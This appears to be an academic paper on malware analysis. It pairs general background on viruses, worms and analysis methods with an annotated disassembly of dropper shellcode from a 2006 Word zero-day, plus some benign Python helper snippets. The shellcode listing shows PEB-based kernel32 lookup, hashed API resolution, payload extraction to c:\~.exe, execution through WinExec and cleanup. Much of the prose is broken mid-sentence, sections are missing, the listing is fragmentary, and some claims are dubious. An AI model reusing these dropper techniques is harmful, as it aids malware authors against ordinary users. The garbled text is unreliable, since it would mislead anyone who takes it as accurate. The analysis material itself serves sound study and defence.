1 IJAEST Volume No 2 Issue No 1 Malware Analysis Using Assembly Level Program 000 012
Abstract - Malware programs are exciting to experiment with. One of the advantages of using assembly language is that you can both create and combat such programs. Generally, all effective malware is written in assembly language. It would be difficult, if not impossible, to do this with other languages (except for C), although it is quite easy to write a self-reproducing program in any language. Viruses have been used to kill other viruses. One could conceive of viruses and worms that run around through a system carrying out useful tasks without direct intervention of particular users. The ability to forensically analyze malicious software is becoming an increasingly important discipline in the field of Digital Forensics. This is because malware is becoming stealthier, targeted, profit driven, managed by criminal organizations, harder to detect and much harder to analyze. Malware analysis requires a considerable skill set to look into deep malware internals when it is designed specifically to detect and hold back

intrusive, or annoying software or program code. The term "computer virus" is sometimes used as a catch-all phrase to include all types of malware, including true viruses.

Software is considered to be malware based on the perceived intent of the creator rather than any particular features. Malware includes computer viruses, worms, trojan horses, spyware, dishonest adware, crimeware, most rootkits, and other malicious and unwanted software. In law, malware is sometimes known as a computer contaminant, for instance in the legal codes of several U.S. states, including California and West Virginia. Malware is not the same as defective software, which is software that has a legitimate purpose but contains harmful bugs.

Preliminary results from Symantec published in 2008 suggested that "the release rate of malicious code and other unwanted programs may be exceeding that of
for businesses operating on the Internet: the acknowledgment that some sizable percentage of Internet customers will always be infected for some reason or another, and that they need to continue doing business with infected customers. The result is a greater emphasis on back-office systems designed to spot fraudulent activities associated with advanced malware operating on customers' computers.

On March 29, 2010, Symantec Corporation named Shaoxing, China as the world's malware capital.

Sometimes, malware is disguised as genuine software, and may come from an official site. Therefore, some security programs, such as McAfee, may call malware "potentially unwanted programs" or "PUP".

Many early infectious programs, including the first Internet Worm and a number of MS-DOS viruses, were written as experiments or pranks. They were generally intended to be harmless or merely annoying, rather than to cause serious damage to computer systems. In some cases, the perpetrator did not realize how much harm their creations would do.

Young programmers learning about viruses and their techniques wrote them simply because they could, or to see how far they could spread. As late as 1999, widespread viruses such as the Melissa virus appear to have been written chiefly as pranks.

Hostile intent related to vandalism can be found in programs designed to cause harm or data loss. Many DOS viruses, and the Windows ExploreZip worm, were designed to destroy files on a hard disk, or to corrupt the file system by writing invalid data to it. Network-borne worms such as the 2001 Code Red worm or the Ramen worm fall into the same category. Designed to vandalize web pages, worms may seem like the online equivalent to graffiti tagging, with the author's alias or affinity group appearing everywhere the worm goes.

Another strictly for-profit category of malware has emerged in spyware: programs designed to monitor users' web browsing, display unsolicited advertisements, or redirect affiliate marketing revenues to the spyware creator. Spyware programs do not spread like viruses; they are, in general, installed by exploiting security holes or are packaged with user-installed software, such as peer-to-peer applications.

The best-known types of malware, viruses and worms, are known for the manner in which they spread, rather than any other particular behavior. The term computer virus is used for a program that has infected some executable software and that, when run, causes the virus to spread to other executables. Viruses may also contain a payload that performs other actions, often malicious. A worm, on the other hand, is a program that actively transmits itself over a network to infect other computers. It too may carry a payload. These definitions lead to the observation that a virus requires user intervention to spread, whereas a worm spreads itself automatically. Using this distinction, infections transmitted by email or Microsoft Word documents, which rely on the recipient opening a file or email to infect the system, would be classified as viruses rather than worms.

Before Internet access became widespread, viruses spread on personal computers by infecting the executable boot sectors of floppy disks. By inserting a copy of itself into the machine code instructions in these executables, a virus causes itself to be run whenever a program is run or the disk is booted. Early computer viruses were written for the Apple II and Macintosh, but they became more widespread with the dominance of the IBM PC and MS-DOS system. Executable-infecting viruses are dependent on users exchanging software or bootable floppies, so they spread rapidly in computer hobbyist circles.

The first worms, network-borne infectious programs, originated not on personal computers, but on multitasking UNIX systems. The first well-known worm was the Internet Worm of 1988, which infected SunOS and VAX
BSD systems. Unlike a virus, this worm did not insert itself into other programs. Instead, it exploited security holes (vulnerabilities) in network server programs and started itself running as a separate process. This same behavior is used by today's worms as well.

With the rise of the Microsoft Windows platform in the 1990s, and the flexible macros of its applications, it became possible to write infectious code in the macro language of Microsoft Word and similar programs. These macro viruses infect documents and templates rather than applications (executables), but rely on the fact that macros in a Word document are a form of executable code.

Today, worms are most commonly written for the Windows OS, although a few like Mare-D and the Lion worm are also written for Linux and UNIX systems. Worms today work in the same basic way as 1988's Internet Worm: they scan the network and leverage vulnerable computers to replicate. Because they need no human intervention, worms can spread with incredible speed.

2. INTRODUCTION
Malware can be defined as “software whose intent is malicious, or whose effect is malicious”. Analysis of malicious software is essential for computer security professionals and digital forensic analysts and is emerging as an important field of research. Malware is often targeted at organizations and is increasingly using anti-forensics techniques to prevent detection and analysis. Commercial Anti-Virus (AV) software is often limited in its ability to detect and remove malware. It is highly unlikely to detect new malware that is unleashed on the internet or a corporate intranet, or malware that has been customized to target specific networks.

It is undeniable that there is a digital arms race between malware developers and malware researchers. As soon as a technique is developed by one side, the other side implements a countermeasure. Two of the major trends are that attackers are increasingly motivated by financial gain and that there are indications that malware development is becoming increasingly commercialized and developed by professionals with extensive software engineering abilities. Another trend is that malware has an increasing variety of techniques available to hinder the forensic analyst. This can include detection of the tools used by the forensic analyst and prevention of analysis via anti-debugging, anti-disassembly, anti-emulation, anti-memory dumping, incorporation of fake signatures and code obfuscation.

Signature based detection of malware is dependent upon an analyst having already analyzed the malware and extracted a signature, as well as the end user having updated their malware signature file.

Although these techniques go some way in protecting a system, they are far from infallible and only of minor assistance to the forensic analyst, especially if the malware is new or has been customized. The increasing availability of high speed Internet connections has also enabled the rapid production and dissemination of malware. All of these factors are contributing to increasing numbers of network borne malware with respect to volume, variety and complexity. Security professionals in the field need to know how to determine if they are the target of an attack and how to eradicate or mitigate threats from their systems. This process of threat reduction can be assisted if security professionals have up to date methodologies and skill sets at their disposal.
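The weakness of content-based signatures noted above can be sketched in a few lines of Python. This is a minimal illustration, not a description of how any particular AV product works: SHA-256 stands in for "a signature", and the names file_signature, signature_db and is_known, as well as the sample bytes, are assumptions made for the example.

```python
import hashlib


def file_signature(data: bytes) -> str:
    """Return a SHA-256 hex digest, used here as a stand-in 'signature'."""
    return hashlib.sha256(data).hexdigest()


# Hypothetical sample that an analyst has already seen and fingerprinted.
known_sample = b"MZ\x90\x00" + b"payload-v1" * 8

# Hypothetical signature database shipped to end users.
signature_db = {file_signature(known_sample)}


def is_known(data: bytes) -> bool:
    """True only if the exact byte content has been fingerprinted before."""
    return file_signature(data) in signature_db


# A "customized" variant: identical except for one flipped bit at the end.
variant = bytearray(known_sample)
variant[-1] ^= 0x01
variant = bytes(variant)

print(is_known(known_sample))  # the analysed sample is recognised
print(is_known(variant))       # the one-bit variant is not
```

A single changed bit produces a different digest, so the variant is not recognised until someone analyses it and the end user's signature file is updated.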
3. THE PROBLEM WITH MALWARE ANALYSIS
The spectrum of malware that represents a real threat is expansive. A non-exhaustive list includes rootkits, worms, bots, trojans, logic bombs, viruses, phishing, spam, spyware, adware, key loggers and backdoors. No computing platform or environment is immune to these threats. Traditionally, malware is thought of as a virus or worm that has a single function or payload. The resulting countermeasure for traditional malware has been the employment of a removal tool that was initiated by signature detection or by recognition of heuristics defined by specific behaviors. These tended to be like the malware they were responding to in that they were unitary or singular in purpose.

Modern network borne malware is increasingly multi-partite in nature, incorporating several infection vectors and possible payloads in the one instance. Signature based systems that rely on file hashing or similar functions that uniquely identify malware based on file contents are increasingly failing due to the mass customization allowable with the use of frameworks. Furthermore, anti-forensic techniques are widely deployed to obfuscate infection, hinder detection and retard eventual removal of the malware. This increasing complexity and entropy makes modern malware analysis a significant undertaking that takes considerable time and expertise, and requires an extensive knowledge domain either in an individual or in coverage provided by a team of analysts.

Two fundamental techniques available to the analyst are static and dynamic analysis. Static analysis does not execute the code; the code is analyzed via disassemblies, call graphs, searches for strings, library calls, and reconstruction of data structures, enumerations and unions within the code. This analysis technique is very time consuming and easily hindered by anti-forensics in the form of code obfuscation, packers and protectors, which are increasingly being used by malware authors.

Dynamic analysis, in contrast, does run the code, and the analyst observes its behavior and interaction with the host and network via mechanisms such as registry, file and network monitoring tools. This technique is generally much easier to conduct than static analysis but is also easily hindered by malware that can detect the use of an emulation environment such as VMware or the use of debugging tools such as IDA Pro. By detecting the use of these tools and environments, the malware can change its behavior. Having detected them, the malware can decide not to run its true payload and can run in a deceptive mode that makes it look like much less of a threat.

It can delete itself together with any evidence, or if it is running with the appropriate privileges, damage or destroy the system that it is being run on or attached

uses an iterative and recursive technique that incorporates both the static and dynamic analysis techniques to extract the full functionality of the code, spiralling into the analysis from the higher level view to the more detailed view. This technique also facilitates the opportunity to discover and mitigate anti-forensic techniques as the analysis process proceeds.

4. ANALYSIS PROCESS
A high level and simplistic view of the malware analysis process is depicted in figure 1 below. It shows malware as one of two inputs to the analysis methodology process, which produces a report as an output. The generated results also feed back into the analysis methodology via an assessment process, which can be used to adjust the methodology dynamically or as a process improvement mechanism. Legal and ethical constraints serve as a bounding constraint to the process.
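To make one of the static techniques from Section 3 concrete: a search for strings reads the file as raw bytes and never executes it. The following is a minimal Python sketch rather than a replacement for a dedicated tool. The function name extract_strings, the minimum length of 4 and the sample bytes are assumptions made for illustration; the two embedded strings are borrowed from names that appear in the Section 6 listing.

```python
import re


def extract_strings(data: bytes, min_len: int = 4):
    """Return printable ASCII and UTF-16LE strings found in raw bytes.

    The data is only read, never executed, which is what makes this a
    static technique.
    """
    # Runs of printable ASCII characters (0x20..0x7e).
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    # Runs of printable characters each followed by a zero byte (UTF-16LE).
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)

    found = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return found


# Hypothetical byte blob: junk bytes around one ASCII and one wide string.
sample = (
    b"\x00\x01"
    + b"kernel32.dll"
    + b"\xff\xfe\x00"
    + "c:\\~.exe".encode("utf-16-le")
    + b"\x00\x00\x90\x90"
)

for s in extract_strings(sample):
    print(s)
```

A packed or obfuscated sample would yield few or no meaningful strings from the same search, which is one way the anti-forensic measures described in Section 3 hinder static analysis.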
scripting and even assembly language programming are important skills required to understand how malware is implemented and how it takes advantage of vulnerabilities. It is also an important skill set for the development of customized tools and for scripting disassemblers and debuggers. The power of being able to script debuggers and disassemblers should not be underestimated in a malware analysis context. Many analysis tools now also allow additional functionality to be added by allowing users to write customized Dynamic Link Library (DLL) plugins or to use scripting languages such as IDA Python, which integrates IDA Pro scripting with the Python scripting language.

detection software and techniques. Therefore, it is imperative that a malware analyst also be well versed in cutting edge technologies and techniques.

5. MALWARE ANALYSIS
An adaptive, eclectic choice of techniques is required for analysis of malware. Various frameworks and methodologies such as static and dynamic analysis exist for the malware analyst to analyze malware such as

successful dissection and analysis of the malware. The skills needed to perform competent analysis are profound, highly technical and are at the cutting edge of computer science.

A wide range of tools is available to the analyst, including debuggers, disassemblers, de-compilers, memory dumpers and unpackers, as well as many other tools common to the discipline of software engineering. All of these tools require niche expertise and a thorough understanding of the principles of their operation and the computers they execute on. However, whether or not the tools are forensically sound and their use acceptable in a court of law is a matter that needs to be seriously considered.

forensically sound without considerable validation or black box testing. Such tools could contain trojans and could easily hide a malicious purpose. They may not be forensically acceptable without significant due diligence on the part of the person or organizations using these types of tools. Other software cracking or reverse engineering sites have scripts for debuggers that can be easily and readily examined. These scripts are useful to extract the known algorithm for dealing with particular packers or to mitigate particular anti-forensic techniques used by creators of such software.
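The point made above about scripting disassemblers can be illustrated without IDA Pro. IDAPython only runs inside IDA, so the sketch below is a stand-in that works on an exported text listing in the "segment:address mnemonic operands ; comment" layout used in Section 6. The names LINE_RE, parse_line and api_hashes are hypothetical, and the sample lines are copied from the Section 6 listing.

```python
import re

# One listing line: "seg000:00000BEA push 10FA6516h ; ReadFile"
LINE_RE = re.compile(
    r"^(?P<seg>\w+):(?P<addr>[0-9A-Fa-f]{8})\s+"
    r"(?P<mnemonic>[a-z]+)\s*(?P<operands>[^;]*?)\s*"
    r"(?:;\s*(?P<comment>.*))?$"
)
# A hexadecimal immediate in MASM style, e.g. "0E8AFE98h".
IMM_RE = re.compile(r"^([0-9A-Fa-f]+)h$")


def parse_line(line: str):
    """Split one instruction line into its fields, or return None."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def api_hashes(listing: str) -> dict:
    """Map each annotated API name to the hash pushed before resolve_func."""
    rows = [r for r in map(parse_line, listing.splitlines()) if r]
    table = {}
    for cur, nxt in zip(rows, rows[1:]):
        imm = IMM_RE.match(cur["operands"])
        if (cur["mnemonic"] == "push" and imm and cur["comment"]
                and nxt["mnemonic"] == "call"
                and nxt["operands"] == "resolve_func"):
            table[cur["comment"].strip()] = int(imm.group(1), 16)
    return table


SAMPLE = """\
seg000:00000BEA push 10FA6516h ; ReadFile
seg000:00000BEF call resolve_func
seg000:00000BF4 mov [edi+SCRATCH.pReadFile], eax
seg000:00000C2A push 0E8AFE98h ; WinExec
seg000:00000C2F call resolve_func
"""

for name, value in api_hashes(SAMPLE).items():
    print(f"{name}: {value:#010x}")
```

Inside a real disassembler, the same idea would normally be written against the tool's own scripting interface instead of its text output; the text-based version is used here only so that the example runs anywhere.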
Analysis of malware will typically require configuring a complete virtual environment suitable for it to run in, not only from an operating systems perspective, but also with the inclusion of network infrastructure and services. Modern malware is increasingly network borne and network enabled, so it may be necessary to provide an environment in which the malware can utilize commonly used services such as a Domain Name System (DNS) server, a Simple Mail Transfer Protocol (SMTP) server or an Internet Relay Chat (IRC) server. Establishing this style of environment allows the malware to initiate communications with these services, so that target data can be captured dynamically to assist in the dynamic analysis of the malware.

isolation to prevent the spread of malware.

6. CODE
seg000:00000000 ;
seg000:00000000 ; +-------------------------------------------------------------------------+
seg000:00000000 ; ¦ This file is generated by The Interactive Disassembler (IDA) ¦
seg000:00000000 ; ¦ Copyright (c) 2006 by DataRescue sa/nv, <ida@datarescue.com> ¦
seg000:00000000 ; +-------------------------------------------------------------------------+
seg000:00000000 ;
seg000:00000000 ; File Name : C:\Documents and Settings\Administrator\Desktop\PLANNING REPORT 5-16-2006.doc
seg000:00000000 ; Format : Binary file
seg000:00000000 ; Base Address: 0000h Range: 0000h - 246F5h Loaded length: 246F5h
seg000:00000000 ;
seg000:00000000 ; Authors: Michael Ligh and Ryan Smith
seg000:00000000 ;
seg000:00000000 ; This is a commented disassembly of the Word 0-day released in
seg000:00000000 ; mid-late May 2006. This document does not describe the vulnerability
seg000:00000000 ; or malware that results from an infection.
seg000:00000000 ;
seg000:00000000
seg000:00000000 ---------------------------------------------------------------------------
seg000:00000B2E
seg000:00000B2E ; The shellcode starts here. It uses Dino Dai Zovi's PEB resolution method
seg000:00000B2E ; to load the base address of kernel32.dll. This information will be
seg000:00000B2E ; used to locate the addresses of kernel32's exports (because they
seg000:00000B2E ; are offsets from the base address).
seg000:00000B2E
seg000:00000B2E nop
seg000:00000B2F nop
seg000:00000B30 mov eax, fs:off_30 ; load PEB address into eax
seg000:00000B36 mov eax, [eax+0Ch]
seg000:00000B39 mov esi, [eax+1Ch]
seg000:00000B3C lodsd
seg000:00000B3D mov esi, [eax+8] ; kernel32.dll base address
seg000:00000B40 jmp loc_DAF
seg000:00000B40
seg000:00000B40 ; At this point, the code jumps to loc_DAF, which immediately calls sub_B45.
seg000:00000B40 ; In doing so, the call instruction sets EIP to 0x00000DB4 (offset in
seg000:00000B40 ; this file) and pushes it on the stack. Notably, the first
seg000:00000B40 ; instruction in sub_B45 is to pop this address into eax (see below)
seg000:00000B40
seg000:00000B45
seg000:00000B45 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
seg000:00000B45
seg000:00000B45
seg000:00000B45

seg000:00000B59 mov [edi+SCRATCH.String1], eax ; c:\~$
seg000:00000B5C add eax, 0Ch
seg000:00000B5F mov [edi+SCRATCH.String2], eax ; c:\~.exe
seg000:00000B62 add eax, 12h
seg000:00000B65 mov [edi+SCRATCH.String3], eax ; c:\~.exe
seg000:00000B6B push edi ; saves the scratch pad for use within loc_BA1
seg000:00000B6C mov edi, esp
seg000:00000B6E xor edi, 0FFFFh
seg000:00000B74 dec edi
seg000:00000B75 dec edi
seg000:00000B76 dec edi
seg000:00000B77
seg000:00000B77 ; The next instructions search memory for the original Word document's
seg000:00000B77 ; own filename. The last mov (above) places the esp pointer into edi.
seg000:00000B77 ; The loop works by reading a dword from edi
which EIP points
seg000:00000BA1 ; the pointer to the structure's first member, so all [edi+xyz] are
seg000:00000BA1 ; references to the additional members. The loop here consists of
seg000:00000BA1 ; pushing two parameters on the stack - a dword hash of the function name
seg000:00000BA1 ; (probably hashed to obfuscate the functions it imports) and the
seg000:00000BA1 ; calls resolve_func
seg000:00000BA1 ; file). When complete,
seg000:00000BA1 ; the code knows exactly where to find all the system resources and
seg000:00000BA1 ; functions it needs.
seg000:00000BA1 ;
seg000:00000BA1 ; Note the xyz field in all the [edi+xyz] operands are natively
seg000:00000BA1 ; numerical. My co-worker Ryan reversed the resolve_func sub routine
seg000:00000BA1 ; and renamed them for readability.
seg000:00000BA1
seg000:00000BA1
seg000:00000BA1 loc_BA1: ; CODE XREF: sub_B45+56j
seg000:00000BA1 dec esi
seg000:00000BA2 dec esi
seg000:00000BA3 pop edi
seg000:00000BA4 mov [edi+SCRATCH.szDOCFILENAME], esi
seg000:00000BA7 push [edi+SCRATCH.hKernel32]
seg000:00000BAA push 0C0397ECh ; GlobalAlloc
seg000:00000BAF call resolve_func
seg000:00000BB4 mov [edi+SCRATCH.pGlobalAlloc], eax

seg000:00000BEA push 10FA6516h ; ReadFile
seg000:00000BEF call resolve_func
seg000:00000BF4 mov [edi+SCRATCH.pReadFile], eax
seg000:00000BF7 push dword ptr [edi+8]
seg000:00000BFA push 0E80A791Fh ; WriteFile

[edi+SCRATCH.pDeleteFileW], eax
seg000:00000C17 push dword ptr [edi+8]
seg000:00000C1A push 76DA08ACh ; SetFilePointer
seg000:00000C1F call resolve_func
seg000:00000C24 mov [edi+SCRATCH.pSetFilePointer], eax
seg000:00000C27 push dword ptr [edi+8]
seg000:00000C2A push 0E8AFE98h ; WinExec
seg000:00000C2F call resolve_func
seg000:00000C34 mov [edi+SCRATCH.pWinExec], eax
seg000:00000C37 push dword ptr [edi+8]
seg000:00000C3A push 99EC8974h ; CopyFileW
seg000:00000C3F call resolve_func
seg000:00000C44 mov [edi+SCRATCH.pCopyFileW], eax
seg000:00000C47 push dword ptr [edi+8]
seg000:00000C4A push 73E2D87Eh ; ExitProcess
seg000:00000C4F call resolve_func
seg000:00000C54 mov [edi+SCRATCH.pExitProcess], eax
seg000:00000C54
seg000:00000C54 ; Delete any previously existing files of the same name. Recall these are
seg000:00000C54 ; two of the three unicode file names discussed earlier.
seg000:00000C54
seg000:00000C57 push [edi+SCRATCH.String2] ; c:\~.exe
seg000:00000C65 push [edi+SCRATCH.String1] ; c:\~$
seg000:00000C68 push [edi+SCRATCH.szDOCFILENAME]
seg000:00000C6B call [edi+SCRATCH.pCopyFileW]
seg000:00000C6E
seg000:00000C6E ; The next 7 push instructions are preparing the arguments for CreateFile.
seg000:00000C6E ; Despite the function name, this only opens an already existing file (in
seg000:00000C6E ; document now at c:\~$ after
seg000:00000C6E ; CopyFile).
seg000:00000C6E
seg000:00000C6E push 0
seg000:00000C70 push 80h
seg000:00000C75 push 3
seg000:00000C77 push 0
seg000:00000C79 push 0
seg000:00000C7B push 80000000h
seg000:00000C80 push [edi+SCRATCH.String1] ; c:\~$
seg000:00000C83 call [edi+SCRATCH.pCreateFileW]

c:\~$
seg000:00000CA7 call [edi+SCRATCH.pReadFile]
seg000:00000CAA push [edi+SCRATCH.field_4] ; dwBytes: size of the heap block
seg000:00000CAD push 40h ; '@' ; uFlags = 40h (GMEM_ZEROINIT)
seg000:00000CAF call [edi+SCRATCH.pGlobalAlloc]
seg000:00000CB2 mov [edi+SCRATCH.pMallocdBuff0], eax
seg000:00000CB5 mov ebx, [edi+SCRATCH.field_4]
seg000:00000CB8 add ebx, 4
seg000:00000CBB not ebx
seg000:00000CBD inc ebx
seg000:00000CBE push 2 ; new offsets and starting loc
seg000:00000CC0 push 0
seg000:00000CC2 push ebx
seg000:00000CC3 push [edi+SCRATCH.hInputFile]
seg000:00000CC6 call [edi+SCRATCH.pSetFilePointer]
seg000:00000CC9 push 0
seg000:00000CCB lea ebx, [edi+SCRATCH.endMarker]
seg000:00000CD1 push ebx
seg000:00000CD2 push [edi+SCRATCH.field_4]
seg000:00000CF4 ; At this point, the decoded payload exists on the heap. What to do with it?
seg000:00000CF4 ; Write it to disk of course! And use the last remaining unicode string as its
seg000:00000CF4 ; file name.
seg000:00000CF4
seg000:00000CF4 push 0
seg000:00000CF6 push 80h
seg000:00000CFB push 2
seg000:00000CFD push 0
seg000:00000CFF push 0

seg000:00000D4D call [edi+SCRATCH.pWinExec]
seg000:00000D50 push [edi+SCRATCH.String1] ; c:\~$
seg000:00000D53 call [edi+SCRATCH.pDeleteFileW]
seg000:00000D56 push 0
seg000:00000D58 call [edi+SCRATCH.pExitProcess]
seg000:00000D58 sub_B45 endp
seg000:00000D58
seg000:00000D5B
seg000:00000D5B ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
seg000:00000D5B
seg000:00000D7F movsx edx, byte ptr [eax]
seg000:00000D82 cmp dh, dl
seg000:00000D84 jz short loc_D8E
seg000:00000D86 ror esi, 0Dh ; rotate right function
seg000:00000D89 add esi, edx
seg000:00000D8B inc eax
seg000:00000D8C jmp short loc_D7F
seg000:00000D8E ; ---------------------------------------------------------------------------
seg000:00000D8E
seg000:00000D8E loc_D8E: ; CODE XREF: resolve_func+29j
seg000:00000D8E cmp edi, esi
seg000:00000D90 pop esi
seg000:00000D91 jnz short loc_D78
seg000:00000D93 pop edx
seg000:00000D94 mov ebp, ebx
seg000:00000D96 mov ebx, [edx+24h]
seg000:00000D99 add ebx, ebp
seg000:00000D9B mov cx, [ebx+ecx*2]

seg000:00000DE1 db 0FFh
seg000:00000DE2 db 0FFh
seg000:00000DE3 db 0FFh
seg000:00000DE4 endp

7. CONCLUSION
Malware analysis is becoming an important field of specialization for forensic analysts. Authors of malware are becoming increasingly profit driven and are incorporating techniques to make their code as stealthy and undetectable as possible. Malware is being written by professional programmers who are very knowledgeable in their craft. They have a very good understanding of digital forensic methods and endeavor to make forensic analysis as difficult as possible.

The knowledge domain required to competently
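Returning to the listing in Section 6: resolve_func identifies each API by a 32-bit hash of its name rather than by the name itself. The loop at 0D7F to 0D8C rotates an accumulator right by 13 bits (ror esi, 0Dh) and then adds the next character (add esi, edx) until it reaches the terminating zero byte. The following Python version is a minimal sketch of that loop. It assumes ASCII names and an accumulator that starts at zero; the instruction that initialises esi is not visible in the excerpt, and the function names ror32 and ror13_hash are chosen here for illustration.

```python
def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by the given number of bits."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Hash an export name the way the loop at 0D7F..0D8C appears to.

    Assumption: the accumulator (esi in the listing) starts at zero.
    """
    acc = 0
    for ch in name.encode("ascii"):
        acc = ror32(acc, 13)           # ror esi, 0Dh
        acc = (acc + ch) & 0xFFFFFFFF  # add esi, edx
    return acc


print(f"{ror13_hash('WinExec'):08X}")
```

Under these assumptions, ror13_hash("WinExec") evaluates to 0x0E8AFE98, the same constant that the listing pushes at 0C2A with the comment "WinExec". Storing only such hashes keeps the imported API names out of the shellcode, which is consistent with the listing's remark that the names are "probably hashed to obfuscate the functions it imports".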
Author Biography:
Mr. S. Murugan is working as ACTS Team Coordinator, CDAC, Bangalore. He received a BSc in Physics from Madurai Kamaraj University, Madurai, in 1989, an MCA degree in Computer Applications from Alagappa University, Karaikudi, Tamilnadu, India, and an MPhil (CS) from Manonmaniam Sundaranar University, Tirunelveli, Tamilnadu, India. He has 17 years of teaching and administrative experience at PG level in the field of Computer Science. He has published 6 papers in national conferences and 2 in international conferences. His research interests include Intelligence Network Security Algorithms and malware prevention and detection mechanisms and algorithms. He has published 8 books and courseware in the field of Computer Science.